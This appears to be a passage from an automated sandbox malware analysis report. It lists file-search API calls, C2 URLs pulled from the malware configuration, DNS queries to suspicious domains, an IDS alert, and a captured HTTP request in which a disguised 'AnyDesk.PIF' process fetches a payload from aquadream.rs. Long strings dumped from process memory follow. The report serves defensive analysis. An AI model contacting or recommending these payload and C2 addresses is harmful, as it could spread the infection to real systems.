          Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF6E94235B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF6E94235B8
          Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF6E9447B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF6E9447B4C

          Networking

          Source: Malware configuration extractor URLs: https://aquadream.rs/244_Ipkokioahlp
          Source: Malware configuration extractor URLs: www.atingdilse.site/d05n/
          Source: DNS query: www.rnuah.xyz
          Source: DNS query: www.yzsports200.xyz
          Source: DNS query: www.9838.xyz
          Source: unknown DNS traffic detected: query: www.estspacefox.shop replaycode: Name error (3)
          Source: unknown DNS traffic detected: query: www.ebsiteclients.online replaycode: Name error (3)
          Source: unknown DNS traffic detected: query: www.trl-migrate.online replaycode: Name error (3)
          Source: unknown DNS traffic detected: query: www.9838.xyz replaycode: Name error (3)
          Source: unknown DNS traffic detected: query: www.rnuah.xyz replaycode: Name error (3)
          Source: unknown DNS traffic detected: query: www.atingdilse.site replaycode: Name error (3)
          Source: unknown DNS traffic detected: query: www.evelupcasino.club replaycode: Name error (3)
          Source: unknown DNS traffic detected: query: www.ultangaziescortbayanlari.online replaycode: Name error (3)
          Source: unknown DNS traffic detected: query: www.askabirokulmumkun.online replaycode: Name error (3)
          Source: unknown DNS traffic detected: query: www.yzsports200.xyz replaycode: Name error (3)
          Source: unknown DNS traffic detected: query: www.ustavoglins.store replaycode: Name error (3)
          Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 10_2_02D5E4B8 InternetCheckConnectionA,10_2_02D5E4B8
          Source: Joe Sandbox View ASN Name: HOSTING90UPSTREAMconnectivityCZ HOSTING90UPSTREAMconnectivityCZ
          Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 185.102.77.43:443
          Source: global traffic HTTP traffic detected: GET /244_Ipkokioahlp HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: aquadream.rs
          Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global traffic DNS traffic detected: DNS query: aquadream.rs
          Source: global traffic DNS traffic detected: DNS query: www.ustavoglins.store
          Source: global traffic DNS traffic detected: DNS query: www.estspacefox.shop
          Source: global traffic DNS traffic detected: DNS query: www.ebsiteclients.online
          Source: global traffic DNS traffic detected: DNS query: www.rnuah.xyz
          Source: global traffic DNS traffic detected: DNS query: www.atingdilse.site
          Source: global traffic DNS traffic detected: DNS query: www.askabirokulmumkun.online
          Source: global traffic DNS traffic detected: DNS query: www.ultangaziescortbayanlari.online
          Source: global traffic DNS traffic detected: DNS query: www.yzsports200.xyz
          Source: global traffic DNS traffic detected: DNS query: www.evelupcasino.club
          Source: global traffic DNS traffic detected: DNS query: www.trl-migrate.online
          Source: global traffic DNS traffic detected: DNS query: www.9838.xyz
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
          Source: explorer.exe, 00000012.00000002.3876463266.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1548457580.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1548457580.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: explorer.exe, 00000012.00000002.3876463266.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1548457580.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1548457580.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: explorer.exe, 00000012.00000002.3876463266.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1548457580.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3876463266.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1548457580.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1548457580.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
          Source: kn.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
          Source: kn.exe, 00000007.00000002.1429457981.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000000.1425526307.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1434200373.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1442396876.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
          Source: explorer.exe, 00000012.00000002.3868282624.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542213586.0000000004405000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobeS
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: explorer.exe, 00000012.00000002.3876463266.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1548457580.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1548457580.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
          Source: explorer.exe, 00000012.00000000.1548457580.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3876463266.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
          Source: explorer.exe, 00000012.00000002.3873956110.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000002.3873928957.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.1541620806.0000000002C80000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.826mza.top
          Source: explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.826mza.top/d05n/
          Source: explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.826mza.top/d05n/www.ursing-caregiver-jobs-za-3.bond
          Source: explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.826mza.topReferer:
          Source: explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.9838.xyz
          Source: explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.9838.xyz/d05n/
          Source: explorer.exe, 00000012.00000002.3879092352.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285822156.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSA4
          Source: explorer.exe, 00000012.00000002.3879092352.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285822156.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
          Source: explorer.exe, 00000012.00000000.1542764819.000000000702D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285352752.000000000704B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.000000000704E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000012.00000000.1548457580.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3876463266.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3876463266.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1548457580.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: AnyDesk.PIF, 0000000A.00000002.1549903683.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1533987559.000000000093E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aquadream.rs/244_Ipkokioahlp
          Source: AnyDesk.PIF, 0000000A.00000002.1533987559.0000000000965000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aquadream.rs/244_Ipkokioahlpx
          Source: AnyDesk.PIF, 0000000A.00000002.1533987559.000000000098B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aquadream.rs/gp
          Source: AnyDesk.PIF, 0000000A.00000002.1533987559.0000000000997000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aquadream.rs:443/244_Ipkokioahlp
          Source: explorer.exe, 00000012.00000002.3876463266.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1548457580.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
          Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
          Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
          Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
          Source: explorer.exe, 00000012.00000002.3879092352.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
